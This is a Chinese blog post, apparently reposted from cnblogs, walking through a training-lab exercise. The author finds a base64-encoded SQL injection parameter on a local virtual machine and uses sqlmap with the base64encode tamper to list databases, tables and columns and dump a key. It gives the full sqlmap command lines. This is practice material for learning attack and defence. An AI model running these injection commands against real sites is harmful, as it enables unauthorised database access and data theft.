黑阔主流攻防之加密与解密的对抗二
第二个虚拟机打开是这样的,
点击order by ranking,发现有一个word参数,参数后面的我们很容易可以看出是base64加密,
这里解密来一波,
很明显是sql查询语句,于是博主直接扔sqlmap跑去了,
检测到word参数有注入点,但是传入的参数都是base64处理过的,于是我们直接导入sqlmap中那个的tamper,base64encode这个模块
检测数据库
1 python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode --level 5
View Code
跑出来四个数据库
有一个数据库与其他数据库格格不入,很明显second就是我们的目标了
下一步,检测数据表
1 python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode --level 5 -D second --tables
View Code
跑出来一个language表
下一步,检测表下面的列名,有三个列名
1 python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode --level 5 -D second -T language --columns
View Code
下一步,根据列名dump出有效信息
1 python sqlmap.py -u http://192.168.5.156/index.php?word=U0VMRUNUKyUyQStGUk9NK2xhbmd1YWdlK29yZGVyK2J5K3JhbmtpbmcrbGltaXQrMCUyQzQ= --tamper=base64encode --level 5 -D second -T language -C year,language,ranking --dump
View Code
ok,成功拿到Key
转载于:https://www.cnblogs.com/mke2fs/p/10651012.html
黑阔主流攻防之加密与解密的对抗二相关推荐
- 黑阔主流攻防之不合理的cookie验证方式
最近博主没事干中(ZIZUOZISHOU),于是拿起某校的习题研究一番,名字很6,叫做黑阔主流攻防习题 虚拟机环境经过一番折腾,配置好后,打开目标地址:192.168.5.155 如图所示 这里看出题 ...
- PDF加密、解密内幕(二) - PDF文件口令加密内幕
PDF加密.解密内幕(二) - PDF文件口令加密内幕 0 几个重要概念 全局加密密钥,简称为全局密钥,该全局密钥由加密字典对象和你输入的口令生成,用来生成对象加密密钥. 对象加密密钥,简称为对象密钥 ...
- PDF加密、解密内幕(二)- PDF文件口令加密内幕
0 几个重要概念 全局加密密钥,简称为全局密钥,该全局密钥由加密字典对象和你输入的口令生成,用来生成对象加密密钥. 对象加密密钥,简称为对象密钥,是用来实际加密PDF文件内容的密钥,不同于上篇PDF加 ...
- 二维 Arnold 的图像置乱加密及解密——Matlab实现
二维 Arnold 的图像置乱加密及解密--Matlab实现 二维 Arnold 的图像置乱加密及解密(1):RGB图像的处理 基于Arnol变换的图像置乱 Arnold变换是俄国数学家Vladimi ...
- 北风网--网络安全系列课程之网络攻防全面实战(涉及加密、解密)
讲师简单介绍:讲师龙飞为北风网网络安全领域讲师,讲师曾经先后在国内各大网站,如黑鹰.甲壳虫之类的黑客网站从事网络安全教育!本系列课程由龙飞讲师主讲,共60课时,全面讲述网络安全方面各大知识,是一个不错 ...
- 加密与解密、OpenSSL(SSL/TLS)、OpenSSH(ssh)、dropbear
下面介绍的是Linux的加密与解密.OpenSSL(SSL/TLS).OpenSSH(ssh).dropbear. 一.数据的加密与解密 1.进程间通信基础 (1).进程间通信方式 同一主机间进程间的 ...
- 对称加密----AES和DES加密、解密
目前主流的加密方式有:(对称加密)AES.DES (非对称加密)RSA.DSA 调用AES/DES加密算法包最精要的就是下面两句话: Cipher cipher = Cipher.get ...
- 常见的加密和解密算法—MD5
转载:https://www.cnblogs.com/maohuidong/p/7967257.html 常见的加密和解密算法-MD5 一.MD5加密概述 Message Digest Algorit ...
- 超千人围观,普及 “反诈” 常见场景及应对手段,还有黑灰产攻防手段
10 月 26 日,由软件绿色联盟举办的 "反诈" 主题直播活动已圆满落幕.本次直播我们特邀了两位 360 的资深技术专家,对<电信网络诈骗趋势解读与应对>.<黑 ...
最新文章
- STM32 逐次逼近寄存器型(SAR)模拟数字转换器(ADC)
- http协议报文体_HTTP协议扫盲(七)请求报文之 GET、POST-FORM 和 POST-FILE
- [有限元] Ansys Workbench 19.2 平面应力问题分析示例
- 教程:VS2010 之TFS入门指南
- ShowAPI识别验证码
- AMOS分析技术:路径分析的非递归模型
- android怎么实现记住密码功能,Android App“记住密码”功能的实现逻辑
- 百度网盘链接怎么同步更新、百度网盘链接同步、百度网盘分享同步更新、百度网盘怎么同步更新、百度网盘资源同步更新、百度网盘分享文件同步更新、百度网盘好友分享同步更新、百度网盘共享文件同步更新...
- 如何找到QQ互联开发者认证在哪?
- Jenkins基础入门-9-构建触发器之项目之间依赖关系
- android studio连接本地SqlServer数据库报网络错误
- 上手Fragment
- linux 执行计划任务
- Studio One v4.6.2 x64 WiN 音乐制作编曲宿主软件下载
- 能够证明“3=0”吗?
- Spring Cloud(十一):Hystrix服务熔断-工作流程
- 一级计算机的分类汇总在哪里,在Excel工作表的数据列表中插入分类汇总
- python猜单词游戏_Python小程序之猜单词游戏
- android跌倒检测,基于Android手机的老人跌倒检测方法的研究与设计
- Windows Phone灵魂诠释:Metro UI界面完全解析